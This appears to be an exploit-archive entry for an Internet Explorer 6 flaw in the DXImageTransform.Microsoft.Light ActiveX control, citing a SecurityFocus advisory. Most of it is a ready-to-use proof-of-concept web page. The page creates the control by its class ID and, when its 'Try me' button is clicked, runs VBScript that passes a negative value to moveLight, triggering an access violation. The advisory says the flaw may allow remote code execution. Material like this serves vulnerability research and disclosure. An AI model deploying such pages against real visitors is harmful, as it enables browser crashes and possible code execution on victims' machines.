source: https://www.securityfocus.com/bid/18303/info

The DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution. 

An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page.

<!--
MS Internet Explorer 6 DirectX Media DoS Vulnerability
DLL: dxtmsft.dll

Discovered & Coded by: r0ut3r (writ3r [at] gmail.com)

Description: 
Sub moveLight (
 	ByVal lightNum  As Long , 
 	ByVal x  As Long , 
 	ByVal y  As Long , 
 	ByVal z  As Long , 
 	ByVal fAbsolute  As Long 
)
Supplying negative parameters throws an access violation. 
-->

<object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight">
	Unable to create object
</object>

<script language="vbscript">
	Sub go
		DXTLight.moveLight "-1", "1", "1", "1", "1"
	End Sub
</script>
<input language=VBScript type="button" value="Try me" onclick="go()">